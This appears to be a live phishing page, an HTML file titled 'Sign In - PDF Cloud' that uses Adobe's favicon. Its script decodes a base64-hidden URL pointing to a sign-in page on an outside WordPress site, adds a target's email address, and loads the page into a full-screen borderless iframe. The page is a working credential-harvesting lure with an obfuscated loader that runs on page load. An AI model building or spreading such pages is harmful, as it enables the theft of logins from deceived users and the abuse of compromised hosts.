<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon" href="https://adobe.com/favicon.ico">
<title>Sign In - PDF Cloud</title>
</head>
<body>
<style>
html, body {
margin: 0;
padding: 0;
width: 100%;
height: 100%;
}
iframe {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
border: none;
}
</style>
<script>
var e = "mailman@openstreetmap.org";
var encodedUrl = "aHR0cHM6Ly9iYW55YXMucHMvd29yZHByZXNzL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDI1LzAxL2xvZy9zaWduaW4uaHRtbCM=";
var decodedUrl = atob(encodedUrl)+e;
var iframe = document.createElement('iframe');
iframe.src = decodedUrl;
document.body.appendChild(iframe);
</script>
</body>
</html>